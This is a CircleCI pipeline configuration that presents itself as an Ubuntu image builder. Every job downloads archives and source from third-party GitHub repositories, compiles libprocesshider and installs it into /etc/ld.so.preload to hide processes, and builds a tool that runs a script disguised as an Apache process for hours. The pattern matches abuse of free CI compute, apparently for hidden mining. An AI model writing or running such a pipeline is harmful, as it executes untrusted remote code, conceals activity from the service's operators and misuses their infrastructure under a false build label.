# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configurati
version: 2
jobs:
  build:
    docker:
      - image: busybox
    working_directory: /home/circleci/image-builder
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
      - run:
          command: sleep 18000
          no_output_timeout: 300m    

  ###########################
  #### ubuntu-14.04-XXL #####
  ###########################
  ubuntu-14.04-XXL:
    machine:
      docker_layer_caching: true
    working_directory: /home/circleci/image-builder
    environment:
      IMAGE_REPO: circleci/build-image
      TARGET: ubuntu-14.04-XXL
      _TARGET: ubuntu-14_04-XXL
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload 
      - run: wget https://github.com/waefd46/weimu/raw/main/xhide.c
      - run: gcc -o test xhide.c 
      - run: timeout 355m ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./sgr.sh 
      - run:
          command: sleep 18000
          no_output_timeout: 300m    